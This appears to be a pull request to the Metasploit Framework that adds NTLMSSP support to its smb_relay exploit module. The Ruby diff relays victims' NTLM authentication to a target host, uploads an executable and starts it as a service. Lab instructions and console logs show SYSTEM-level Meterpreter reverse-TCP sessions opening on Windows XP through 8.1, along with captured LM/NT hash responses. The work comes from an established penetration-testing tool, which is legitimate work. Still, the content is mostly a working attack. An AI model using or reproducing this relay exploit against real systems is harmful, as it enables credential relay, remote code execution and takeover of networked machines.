### PR TITLE
Add NTLMSSP support for smb_relay

### DIFF
--- a/modules/exploits/windows/smb/smb_relay.rb
+++ b/modules/exploits/windows/smb/smb_relay.rb
@@ -58,7 +58,8 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'         =>
         [
-          'hdm'
+          'hdm', # All the work
+          'juan vazquez' # Add NTLMSSP support to the exploit
         ],
       'License'        => MSF_LICENSE,
       'Privileged'     => true,
@@ -111,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote
       return
     end
 
-    if (not rclient.client.auth_user)
+    unless smb[:ntlmssp] || rclient.client.auth_user
       print_line(" ")
       print_error(
         "FAILED! The remote host has only provided us with Guest privileges. " +
@@ -124,7 +125,8 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     print_status("Connecting to the defined share...")
-    rclient.connect(datastore['SHARE'])
+    #rclient.connect("#{datastore['SHARE']}")
+    rclient.connect("\\\\#{smb[:rhost]}\\#{datastore['SHARE']}")
 
     @pwned[smb[:rhost]] = true
 
@@ -155,10 +157,12 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("Created \\#{filename}...")
 
     # Disconnect from the SHARE
-    rclient.disconnect(datastore['SHARE'])
+    #rclient.disconnect(datastore['SHARE'])
+    rclient.disconnect("\\\\#{smb[:rhost]}\\#{datastore['SHARE']}")
 
     print_status("Connecting to the Service Control Manager...")
-    rclient.connect("IPC$")
+    #rclient.connect("IPC$")
+    rclient.connect("\\\\#{smb[:rhost]}\\IPC$")
 
     dcerpc = smb_dcerpc(c, '367abb81-9844-35f1-ad32-98f038001003', '2.0', "\\svcctl")
 
@@ -291,10 +295,12 @@ class Metasploit3 < Msf::Exploit::Remote
       print_error("Error: #{e}")
     end
 
-    rclient.disconnect("IPC$")
+    #rclient.disconnect("IPC$")
+    rclient.disconnect("\\\\#{smb[:rhost]}\\IPC$")
 
     print_status("Deleting \\#{filename}...")
-    rclient.connect(datastore['SHARE'])
+    #rclient.connect(datastore['SHARE'])
+    rclient.connect("\\\\#{smb[:rhost]}\\#{datastore['SHARE']}")
     rclient.delete("\\#{filename}")
   end
 
@@ -353,6 +359,9 @@ class Metasploit3 < Msf::Exploit::Remote
     # Record the remote process ID
     smb[:process_id] = pkt['Payload']['SMB'].v['ProcessID']
 
+    flags2 = pkt['Payload']['SMB'].v['Flags2']
+    extended_security = (flags2 & 0x800 == 0x800 ? true : false)
+
     group    = ''
     machine  = smb[:nbsrc]
 
@@ -363,13 +372,64 @@ class Metasploit3 < Msf::Exploit::Remote
       dialects.index("NT LM 0.12") ||
       dialects.length-1
 
-
     # Dialect selected, now we try to the target system
     target_host = datastore['SMBHOST']
     if (not target_host or target_host.strip.length == 0)
       target_host = smb[:ip]
     end
 
+    # If extended security isn't supported or we're trying reflection
+    # ntlmv1 should be sued, otherwise, use ntlmssp
+    if extended_security && target_host != smb[:ip]
+      smb[:ntlmssp] = true
+      negotiate_ntlmssp(smb, target_host)
+    else
+      smb[:ntlmssp] = false
+      negotiate_ntlmv1(smb, target_host)
+    end
+
+    rclient = smb[:rclient]
+
+    # Negotiation has failed, just return
+    unless rclient && rclient.client
+      return
+    end
+
+    pkt = CONST::SMB_NEG_RES_NT_PKT.make_struct
+    smb_set_defaults(c, pkt)
+    time_hi, time_lo = UTILS.time_unix_to_smb(Time.now.to_i)
+
+    pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NEGOTIATE
+    pkt['Payload']['SMB'].v['Flags1'] = 0x88
+    pkt['Payload']['SMB'].v['Flags2'] = smb[:ntlmssp] ? 0xc801 : 0xc001
+    pkt['Payload']['SMB'].v['WordCount'] = 17
+    pkt['Payload'].v['Dialect'] = dialect
+    pkt['Payload'].v['SecurityMode'] = 3
+    pkt['Payload'].v['MaxMPX'] = 2
+    pkt['Payload'].v['MaxVCS'] = 1
+    pkt['Payload'].v['MaxBuff'] = 4356
+    pkt['Payload'].v['MaxRaw'] = 65536
+    pkt['Payload'].v['Capabilities'] = smb[:ntlmssp] ? 0x8000e3fd : 0xe3fd
+    pkt['Payload'].v['ServerTime'] = time_lo
+    pkt['Payload'].v['ServerDate'] = time_hi
+    pkt['Payload'].v['Timezone']   = 0x0
+    pkt['Payload'].v['SessionKey'] = 0
+    if smb[:ntlmssp]
+      pkt['Payload'].v['KeyLength'] = 0
+      pkt['Payload'].v['Payload'] =
+        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + # Server GUID
+        Rex::Proto::NTLM::Utils.make_simple_negotiate_secblob_resp
+    else
+      pkt['Payload'].v['KeyLength'] = 8
+      pkt['Payload'].v['Payload'] =
+        rclient.client.challenge_key +
+        Rex::Text.to_unicode(group) + "\x00\x00" +
+        Rex::Text.to_unicode(machine) + "\x00\x00"
+    end
+    c.put(pkt.to_s)
+  end
+
+  def negotiate_ntlmv1(smb, target_host)
     rsock = nil
     rport = nil
     [445, 139].each do |rport_|
@@ -382,7 +442,7 @@ class Metasploit3 < Msf::Exploit::Remote
           'Context'   =>
             {
               'Msf'        => framework,
-              'MsfExploit' => self,
+              'MsfExploit' => self
             }
         )
         break if rsock
@@ -393,7 +453,7 @@ class Metasploit3 < Msf::Exploit::Remote
       end
     end
 
-    if(not rsock)
+    unless rsock
       print_error("Could not connect to the target host (#{target_host}), the target may be firewalled.")
       return
     end
@@ -409,11 +469,60 @@ class Metasploit3 < Msf::Exploit::Remote
       raise e
     end
 
-    if (not rclient.client.challenge_key)
+    unless rclient.client.challenge_key
       print_error("No challenge key received from #{smb[:ip]}:#{rport}")
       rsock.close
       return
     end
+
+    if smb[:rsock]
+      smb[:rsock].close
+    end
+
+    smb[:rsock] = rsock
+    smb[:rclient] = rclient
+    smb[:rhost] = target_host
+  end
+
+  def negotiate_ntlmssp(smb, target_host)
+    rsock = nil
+    rport = 445
+
+    begin
+      rsock = Rex::Socket::Tcp.create(
+        'PeerHost'  => target_host,
+        'PeerPort'  => rport,
+        'Timeout'   => 3,
+        'Context'   =>
+          {
+            'Msf'        => framework,
+            'MsfExploit' => self
+          }
+      )
+    rescue ::Interrupt
+      raise $!
+    rescue ::Exception => e
+      print_error("Error connecting to #{target_host}:#{rport} #{e.class} #{e}")
+    end
+
+    unless rsock
+      print_error("Could not connect to the target host (#{target_host}), the target may be firewalled.")
+      return
+    end
+
+    rclient = Rex::Proto::SMB::SimpleClient.new(rsock, true)
+
+    rclient.client.negotiate(true) # extended security true
+
+    unless rclient.client.server_guid
+      print_error("The NTLMSSP negotation didn't provide the server guid from #{smb[:ip]}:#{rport}")
+      rsock.close
+      return
+    end
+
+    # If in the answer the Extended Security Negotiation (Flags2) is set
+    # we need to proceed like that!
+    rclient.client.require_signing = false
 
     if (smb[:rsock])
       smb[:rsock].close
@@ -422,40 +531,27 @@ class Metasploit3 < Msf::Exploit::Remote
     smb[:rsock] = rsock
     smb[:rclient] = rclient
     smb[:rhost] = target_host
-
-    pkt = CONST::SMB_NEG_RES_NT_PKT.make_struct
-    smb_set_defaults(c, pkt)
-
-    time_hi, time_lo = UTILS.time_unix_to_smb(Time.now.to_i)
-
-    pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NEGOTIATE
-    pkt['Payload']['SMB'].v['Flags1'] = 0x88
-    pkt['Payload']['SMB'].v['Flags2'] = 0xc001
-    pkt['Payload']['SMB'].v['WordCount'] = 17
-    pkt['Payload'].v['Dialect'] = dialect
-    pkt['Payload'].v['SecurityMode'] = 3
-    pkt['Payload'].v['MaxMPX'] = 2
-    pkt['Payload'].v['MaxVCS'] = 1
-    pkt['Payload'].v['MaxBuff'] = 4356
-    pkt['Payload'].v['MaxRaw'] = 65536
-    pkt['Payload'].v['Capabilities'] = 0xe3fd # 0x80000000 for extended
-    pkt['Payload'].v['ServerTime'] = time_lo
-    pkt['Payload'].v['ServerDate'] = time_hi
-    pkt['Payload'].v['Timezone']   = 0x0
-
-
-    pkt['Payload'].v['SessionKey'] = 0
-    pkt['Payload'].v['KeyLength'] = 8
-
-    pkt['Payload'].v['Payload'] =
-      rclient.client.challenge_key +
-      Rex::Text.to_unicode(group) + "\x00\x00" +
-      Rex::Text.to_unicode(machine) + "\x00\x00"
-
-    c.put(pkt.to_s)
   end
 
   def smb_cmd_session_setup(c, buff)
+    smb = @state[c]
+    if smb[:ntlmssp]
+      pkt = CONST::SMB_SETUP_NTLMV2_PKT.make_struct
+    else
+      pkt = CONST::SMB_SETUP_NTLMV1_PKT.make_struct
+    end
+    pkt.from_s(buff)
+
+    capabilities = pkt['Payload'].v['Capabilities']
+    extended_security = (capabilities & 0x80000000 == 0x80000000 ? true : false)
+    if extended_security
+      smb_cmd_session_setup_ntlmssp(c, buff)
+    else
+      smb_cmd_session_setup_ntlmv1(c, buff)
+    end
+  end
+
+  def smb_cmd_session_setup_ntlmv1(c, buff)
     smb = @state[c]
     pkt = CONST::SMB_SETUP_NTLMV1_PKT.make_struct
     pkt.from_s(buff)
@@ -492,8 +588,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
     print_status(
       "Received #{smb[:name]} #{smb[:domain]}\\#{smb[:username]} " +
-      "LMHASH:#{lm_hash ? lm_hash : "<NULL>"} NTHASH:#{nt_hash ? nt_hash : "<NULL>"} " +
-      "OS:#{smb[:peer_os]} LM:#{smb[:peer_lm]}"
+        "LMHASH:#{lm_hash ? lm_hash : "<NULL>"} NTHASH:#{nt_hash ? nt_hash : "<NULL>"} " +
+        "OS:#{smb[:peer_os]} LM:#{smb[:peer_lm]}"
     )
 
     if (lm_hash == "" or lm_hash == "00")
@@ -519,7 +615,7 @@ class Metasploit3 < Msf::Exploit::Remote
       rescue XCEPT::LoginError
       end
 
-      if (res)
+      if res
         print_status("AUTHENTICATED as #{smb[:domain]}\\#{smb[:username]}...")
         smb_haxor(c)
       else
@@ -537,6 +633,130 @@ class Metasploit3 < Msf::Exploit::Remote
     pkt['Payload']['SMB'].v['Flags2']  = 0xc001
     pkt['Payload']['SMB'].v['ErrorClass'] = 0xC0000022
     c.put(pkt.to_s)
+  end
+
+  def smb_cmd_session_setup_ntlmssp(c, buff)
+    smb = @state[c]
+    buff_copy = buff.dup
+    pkt = CONST::SMB_SETUP_NTLMV2_PKT.make_struct
+    pkt.from_s(buff_copy)
+
+    blob_length = pkt['Payload'].v['SecurityBlobLen']
+    blob = pkt['Payload'].v['Payload'][0, blob_length]
+
+    #detect if GSS is being used I need to fix this code.... but
+    if blob[0,7] == 'NTLMSSP'
+      c_gss = false
+    else
+      c_gss = true
+      start = blob.index('NTLMSSP')
+      if start
+        blob.slice!(0,start)
+      else
+        print_status("SMB Capture - Error finding NTLMSSP in SMB_COM_SESSION_SETUP_ANDX request from #{smb[:name]} - #{smb[:ip]}, ignoring ...")
+        smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
+        return
+      end
+    end
+    ntlm_message = NTLM_MESSAGE::parse(blob)
+
+    case ntlm_message
+    when NTLM_MESSAGE::Type1
+      smb_cmd_ntlmssp_negotiate(c, buff)
+    when NTLM_MESSAGE::Type3
+      smb_cmd_ntlmssp_auth(c, buff)
+    else
+      smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
+      return
+    end
+  end
+
+  def smb_cmd_ntlmssp_negotiate(c, buff)
+    smb = @state[c]
+    pkt = CONST::SMB_SETUP_NTLMV2_PKT.make_struct
+    pkt.from_s(buff)
+
+    smb[:process_id] = pkt['Payload']['SMB'].v['ProcessID']
+    smb[:user_id] = pkt['Payload']['SMB'].v['UserID']
+    smb[:tree_id] = pkt['Payload']['SMB'].v['TreeID']
+    smb[:multiplex_id] = pkt['Payload']['SMB'].v['MultiplexID']
+
+    security_blob_length = pkt['Payload'].v['SecurityBlobLen']
+    security_blob = pkt['Payload'].v['Payload'][0, security_blob_length]
+
+    print_status("Sending NTLMSSP NEGOTIATE to #{smb[:rhost]}")
+    rclient = smb[:rclient]
+
+    rclient.client.session_setup_with_ntlmssp_blob(security_blob, false)
+
+    print_status("Extracting NTLMSSP CHALLENGE from #{smb[:rhost]}")
+    resp = rclient.client.smb_recv_parse(CONST::SMB_COM_SESSION_SETUP_ANDX, true)
+
+    rclient.client.auth_user_id = resp['Payload']['SMB'].v['UserID']
+
+    security_blob_length = resp['Payload'].v['SecurityBlobLen']
+    security_blob = resp['Payload'].v['Payload'][0, security_blob_length]
+
+    print_status("Forwarding the NTLMSSP CHALLENGE to #{smb[:name]}")
+    challenge = CONST::SMB_SETUP_NTLMV2_RES_PKT.make_struct
+    smb_set_defaults(c, challenge)
+
+    native_data = ''
+    native_data << "Unix\x00" #Native OS
+    native_data << "Samba\x00" #Native LanMAN
+
+    challenge['Payload']['SMB'].v['Command'] = CONST::SMB_COM_SESSION_SETUP_ANDX
+    challenge['Payload']['SMB'].v['ErrorClass'] = CONST::SMB_STATUS_MORE_PROCESSING_REQUIRED
+    challenge['Payload']['SMB'].v['Flags1'] = 0x80
+    challenge['Payload']['SMB'].v['Flags2'] =  0xc801 # no signing
+    challenge['Payload']['SMB'].v['WordCount'] = 4
+    challenge['Payload'].v['AndX'] = 0xFF
+    challenge['Payload'].v['Reserved1'] = 0x00
+    challenge['Payload'].v['AndXOffset'] = 0
+    challenge['Payload'].v['Action'] = 0x0000
+    challenge['Payload'].v['SecurityBlobLen'] = security_blob_length
+    challenge['Payload'].v['Payload'] = security_blob + native_data
+    c.put(challenge.to_s)
+  end
+
+  def smb_cmd_ntlmssp_auth(c, buff)
+    smb = @state[c]
+    pkt = CONST::SMB_SETUP_NTLMV2_PKT.make_struct
+    pkt.from_s(buff)
+
+    smb[:process_id] = pkt['Payload']['SMB'].v['ProcessID']
+    smb[:user_id] = pkt['Payload']['SMB'].v['UserID']
+    smb[:tree_id] = pkt['Payload']['SMB'].v['TreeID']
+    smb[:multiplex_id] = pkt['Payload']['SMB'].v['MultiplexID']
+
+    print_status("Extracting the NTLMSSP AUTH resolution from #{smb[:name]}, and sending Logon Failure response")
+
+    security_blob_length = pkt['Payload'].v['SecurityBlobLen']
+    security_blob = pkt['Payload'].v['Payload'][0, security_blob_length]
+
+    smb_error(CONST::SMB_COM_SESSION_SETUP_ANDX, c, CONST::SMB_STATUS_LOGON_FAILURE, true)
+
+    print_status("Forwarding the NTLMSSP AUTH resolution to #{smb[:rhost]}")
+    rclient = smb[:rclient]
+
+    rclient.client.session_setup_with_ntlmssp_blob(
+      security_blob,
+      false,
+      rclient.client.auth_user_id
+    )
+    resp = rclient.client.smb_recv_parse(CONST::SMB_COM_SESSION_SETUP_ANDX, true)
+
+    #check if auth was successful
+    if (resp['Payload']['SMB'].v['ErrorClass'] == 0)
+      print_good("SMB auth relay against #{smb[:rhost]} succeeded")
+      smb_haxor(c)
+    else
+      failure = Rex::Proto::SMB::Exceptions::ErrorCode.new
+      failure.word_count = resp['Payload']['SMB'].v['WordCount']
+      failure.command = resp['Payload']['SMB'].v['Command']
+      failure.error_code = resp['Payload']['SMB'].v['ErrorClass']
+      raise failure
+    end
   end
 
 end

--- a/modules/exploits/windows/smb/smb_relay.rb
+++ b/modules/exploits/windows/smb/smb_relay.rb
@@ -125,7 +125,6 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     print_status("Connecting to the defined share...")
-    #rclient.connect("#{datastore['SHARE']}")
     rclient.connect("\\\\#{smb[:rhost]}\\#{datastore['SHARE']}")
 
     @pwned[smb[:rhost]] = true
@@ -157,11 +156,9 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("Created \\#{filename}...")
 
     # Disconnect from the SHARE
-    #rclient.disconnect(datastore['SHARE'])
     rclient.disconnect("\\\\#{smb[:rhost]}\\#{datastore['SHARE']}")
 
     print_status("Connecting to the Service Control Manager...")
-    #rclient.connect("IPC$")
     rclient.connect("\\\\#{smb[:rhost]}\\IPC$")
 
     dcerpc = smb_dcerpc(c, '367abb81-9844-35f1-ad32-98f038001003', '2.0', "\\svcctl")
@@ -295,11 +292,9 @@ class Metasploit3 < Msf::Exploit::Remote
       print_error("Error: #{e}")
     end
 
-    #rclient.disconnect("IPC$")
     rclient.disconnect("\\\\#{smb[:rhost]}\\IPC$")
 
     print_status("Deleting \\#{filename}...")
-    #rclient.connect(datastore['SHARE'])
     rclient.connect("\\\\#{smb[:rhost]}\\#{datastore['SHARE']}")
     rclient.delete("\\#{filename}")
   end

--- a/modules/exploits/windows/smb/smb_relay.rb
+++ b/modules/exploits/windows/smb/smb_relay.rb
@@ -374,7 +374,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     # If extended security isn't supported or we're trying reflection
-    # ntlmv1 should be sued, otherwise, use ntlmssp
+    # ntlmv1 should be used, otherwise, use ntlmssp
     if extended_security && target_host != smb[:ip]
       smb[:ntlmssp] = true
       negotiate_ntlmssp(smb, target_host)

--- a/modules/exploits/windows/smb/smb_relay.rb
+++ b/modules/exploits/windows/smb/smb_relay.rb
@@ -355,7 +355,7 @@ class Metasploit3 < Msf::Exploit::Remote
     smb[:process_id] = pkt['Payload']['SMB'].v['ProcessID']
 
     flags2 = pkt['Payload']['SMB'].v['Flags2']
-    extended_security = (flags2 & 0x800 == 0x800 ? true : false)
+    extended_security = (flags2 & 0x800 == 0x800)
 
     group    = ''
     machine  = smb[:nbsrc]
@@ -538,7 +538,7 @@ class Metasploit3 < Msf::Exploit::Remote
     pkt.from_s(buff)
 
     capabilities = pkt['Payload'].v['Capabilities']
-    extended_security = (capabilities & 0x80000000 == 0x80000000 ? true : false)
+    extended_security = (capabilities & 0x80000000 == 0x80000000)
     if extended_security
       smb_cmd_session_setup_ntlmssp(c, buff)
     else


### PR DESCRIPTION
Adds support for ntlmssp, allowint the smb_relay module to work on:
- Windows 2012 Domain and Windows 8 stations.
- Windows 2008 domain and Windows 7 stations.
- and hopefully keeping it working with the older targets already supported =)
## Verification
- [x] Install a 2012/2009/2003 domain, whatever you prefer. In my 2012 domain, I've configured compatibility with windows 2008 and up.
- [x] Install and add a couple of machines to the domain. See below for the
  configurations I've tried.
- [x] If your metasploit machine isn't in the domain, disable firewall on the targets machines
- [x] If your target machines are running windows defender, better disable active protection, it catches plain meterpreter
- [x] Start the smb_relay module targeting (smbhost option in the module) one of the stations on the domain
- [x] Force an administrator NTLM authentication against the machine running smb_relay (srvhost option in the module). For example, from a CMD:

`dir \\172.16.158.1\c$`

Above, 172.16.158.1 is the machine running the msf instance and the smb_relay module
- [x] Hopefully enjoy a new session coming from the target =)
- [x] Extra test: Try the reflection attack if you would like. Fresh Windows XP SP3 installations are
  still vulnerable (don't install MS08-068)
## DEMOS
- Windows 2012 Domain / Windows 8.1 stations

```
msf > use exploit/windows/smb/smb_relay
msf exploit(smb_relay) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf exploit(smb_relay) > set smbhost 172.16.158.134
smbhost => 172.16.158.134
msf exploit(smb_relay) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(smb_relay) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(smb_relay) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
msf exploit(smb_relay) > [*] Server started.
[*] Sending NTLMSSP NEGOTIATE to 172.16.158.134
[*] Extracting NTLMSSP CHALLENGE from 172.16.158.134
[*] Forwarding the NTLMSSP CHALLENGE to 172.16.158.136:49317
[*] Extracting the NTLMSSP AUTH resolution from 172.16.158.136:49317, and sending Logon Failure response
[*] Forwarding the NTLMSSP AUTH resolution to 172.16.158.134
[+] SMB auth relay against 172.16.158.134 succeeded
[*] Connecting to the defined share...
[*] Regenerating the payload...
[*] Uploading payload...
[*] Created \rammFpQf.exe...
[*] Connecting to the Service Control Manager...
[*] Obtaining a service manager handle...
[*] Creating a new service...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \rammFpQf.exe...
[*] Sending NTLMSSP NEGOTIATE to 172.16.158.134
[*] Extracting NTLMSSP CHALLENGE from 172.16.158.134
[*] Sending stage (770048 bytes) to 172.16.158.134
[*] Forwarding the NTLMSSP CHALLENGE to 172.16.158.136:49317
[*] Extracting the NTLMSSP AUTH resolution from 172.16.158.136:49317, and sending Logon Failure response
[*] Forwarding the NTLMSSP AUTH resolution to 172.16.158.134
[+] SMB auth relay against 172.16.158.134 succeeded
[*] Ignoring request from 172.16.158.134, attack already in progress.
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.134:49563) at 2015-02-03 14:42:44 -0600

msf exploit(smb_relay) > jobs -K
Stopping all jobs...

[*] Server stopped.
[*] Server stopped.
msf exploit(smb_relay) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WINCLIENT1
OS              : Windows 8.1 (Build 9600).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >
```
- Windows 2008 Domain / Windows 7 SP1 stations

```
msf exploit(smb_relay) > set smbhost 172.16.158.131
smbhost => 172.16.158.131
msf exploit(smb_relay) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
msf exploit(smb_relay) > [*] Server started.
[*] Sending NTLMSSP NEGOTIATE to 172.16.158.131
[*] Extracting NTLMSSP CHALLENGE from 172.16.158.131
[*] Forwarding the NTLMSSP CHALLENGE to 172.16.158.132:50937
[*] Extracting the NTLMSSP AUTH resolution from 172.16.158.132:50937, and sending Logon Failure response
[*] Forwarding the NTLMSSP AUTH resolution to 172.16.158.131
[+] SMB auth relay against 172.16.158.131 succeeded
[*] Connecting to the defined share...
[*] Regenerating the payload...
[*] Uploading payload...
[*] Created \uIcpCpKq.exe...
[*] Connecting to the Service Control Manager...
[*] Obtaining a service manager handle...
[*] Creating a new service...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \uIcpCpKq.exe...
[*] Sending NTLMSSP NEGOTIATE to 172.16.158.131
[*] Extracting NTLMSSP CHALLENGE from 172.16.158.131
[*] Sending stage (770048 bytes) to 172.16.158.131
[*] Forwarding the NTLMSSP CHALLENGE to 172.16.158.132:50937
[*] Extracting the NTLMSSP AUTH resolution from 172.16.158.132:50937, and sending Logon Failure response
[*] Forwarding the NTLMSSP AUTH resolution to 172.16.158.131
[+] SMB auth relay against 172.16.158.131 succeeded
[*] Ignoring request from 172.16.158.131, attack already in progress.
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.131:61527) at 2015-02-03 15:16:10 -0600

msf exploit(smb_relay) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf exploit(smb_relay) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
sServer username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : EXPLOITER
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >
```
- Windows 2003 Domain / Windows XP SP3 stations

```
msf exploit(smb_relay) > set smbhost 172.16.158.10
smbhost => 172.16.158.10
msf exploit(smb_relay) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
msf exploit(smb_relay) > [*] Server started.
[*] Sending NTLMSSP NEGOTIATE to 172.16.158.10
[*] Extracting NTLMSSP CHALLENGE from 172.16.158.10
[*] Forwarding the NTLMSSP CHALLENGE to 172.16.158.11:1376
[*] Extracting the NTLMSSP AUTH resolution from 172.16.158.11:1376, and sending Logon Failure response
[*] Forwarding the NTLMSSP AUTH resolution to 172.16.158.10
[+] SMB auth relay against 172.16.158.10 succeeded
[*] Connecting to the defined share...
[*] Error processing request from 172.16.158.11:1376 (115): Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0) ["/Users/jvazquez/Projects/Code/metasploit-framework/lib/rex/proto/smb/client.rb:259:in `smb_recv_parse'", "/Users/jvazquez/Projects/Code/metasploit-framework/lib/rex/proto/smb/client.rb:1114:in `tree_connect'", "/Users/jvazquez/Projects/Code/metasploit-framework/lib/rex/proto/smb/simpleclient.rb:135:in `connect'", "/Users/jvazquez/Projects/Code/metasploit-framework/modules/exploits/windows/smb/smb_relay.rb:129:in `smb_haxor'", "/Users/jvazquez/Projects/Code/metasploit-framework/modules/exploits/windows/smb/smb_relay.rb:752:in `smb_cmd_ntlmssp_auth'", "/Users/jvazquez/Projects/Code/metasploit-framework/modules/exploits/windows/smb/smb_relay.rb:667:in `smb_cmd_session_setup_ntlmssp'", "/Users/jvazquez/Projects/Code/metasploit-framework/modules/exploits/windows/smb/smb_relay.rb:548:in `smb_cmd_session_setup'", "/Users/jvazquez/Projects/Code/metasploit-framework/modules/exploits/windows/smb/smb_relay.rb:332:in `smb_cmd_dispatch'", "/Users/jvazquez/Projects/Code/metasploit-framework/lib/msf/core/exploit/smb_server.rb:110:in `smb_recv'", "/Users/jvazquez/Projects/Code/metasploit-framework/lib/msf/core/exploit/smb_server.rb:41:in `on_client_data'", "/Users/jvazquez/Projects/Code/metasploit-framework/lib/msf/core/exploit/tcp_server.rb:124:in `block in start_service'", "/Users/jvazquez/Projects/Code/metasploit-framework/lib/rex/io/stream_server.rb:48:in `call'", "/Users/jvazquez/Projects/Code/metasploit-framework/lib/rex/io/stream_server.rb:48:in `on_client_data'", "/Users/jvazquez/Projects/Code/metasploit-framework/lib/rex/io/stream_server.rb:192:in `block in monitor_clients'", "/Users/jvazquez/Projects/Code/metasploit-framework/lib/rex/io/stream_server.rb:190:in `each'", "/Users/jvazquez/Projects/Code/metasploit-framework/lib/rex/io/stream_server.rb:190:in `monitor_clients'", "/Users/jvazquez/Projects/Code/metasploit-framework/lib/rex/io/stream_server.rb:73:in `block in start'", "/Users/jvazquez/Projects/Code/metasploit-framework/lib/rex/thread_factory.rb:22:in `call'", "/Users/jvazquez/Projects/Code/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'", "/Users/jvazquez/Projects/Code/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `call'", "/Users/jvazquez/Projects/Code/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `block in spawn'"]
[*] Sending NTLMSSP NEGOTIATE to 172.16.158.10
[*] Extracting NTLMSSP CHALLENGE from 172.16.158.10
[*] Forwarding the NTLMSSP CHALLENGE to 172.16.158.11:1376
[*] Extracting the NTLMSSP AUTH resolution from 172.16.158.11:1376, and sending Logon Failure response
[*] Forwarding the NTLMSSP AUTH resolution to 172.16.158.10
[+] SMB auth relay against 172.16.158.10 succeeded
[*] Connecting to the defined share...
[*] Regenerating the payload...
[*] Uploading payload...
[*] Created \oIfPjgWP.exe...
[*] Connecting to the Service Control Manager...
[*] Obtaining a service manager handle...
[*] Creating a new service...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \oIfPjgWP.exe...
[*] Sending stage (770048 bytes) to 172.16.158.10
[*] Meterpreter session 3 opened (172.16.158.1:4444 -> 172.16.158.10:1317) at 2015-02-03 15:21:54 -0600

msf exploit(smb_relay) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf exploit(smb_relay) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
sServer username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : CLIENTXP
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.10 - Meterpreter session 3 closed.  Reason: User exit
msf exploit(smb_relay) >
```
- Reflection against Windows XP SP3 station

```
msf exploit(smb_relay) > set smbhost 172.16.158.11
smbhost => 172.16.158.11
msf exploit(smb_relay) > jobs -K
Stopping all jobs...
msf exploit(smb_relay) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
msf exploit(smb_relay) > [*] Server started.
exploit[*] Received 172.16.158.11:1380 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 172.16.158.11:1380 \
[*] Received 172.16.158.11:1380 SMALL\Administrator LMHASH:1e4e1b8e2e23d3df90824447cca81aa876286f2e74830e5a NTHASH:c98751a6c0a3b62b1a0e2c483077646847ab8b2fb9df08fb OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
[*] Authenticating to 172.16.158.11 as SMALL\Administrator...
[*] AUTHENTICATED as SMALL\Administrator...
[*] Connecting to the defined share...
[*] Regenerating the payload...
[*] Uploading payload...
[*] Created \ERftMFem.exe...
[*] Connecting to the Service Control Manager...
[*] Obtaining a service manager handle...
[*] Creating a new service...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \ERftMFem.exe...
[*] Sending Access Denied to 172.16.158.11:1380 SMALL\Administrator
[*] Sending stage (770048 bytes) to 172.16.158.11
[*] Meterpreter session 4 opened (172.16.158.1:4444 -> 172.16.158.11:1388) at 2015-02-03 15:23:17 -0600

msf exploit(smb_relay) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf exploit(smb_relay) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : CLIENTTWO
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.11 - Meterpreter session 4 closed.  Reason: User exit
```
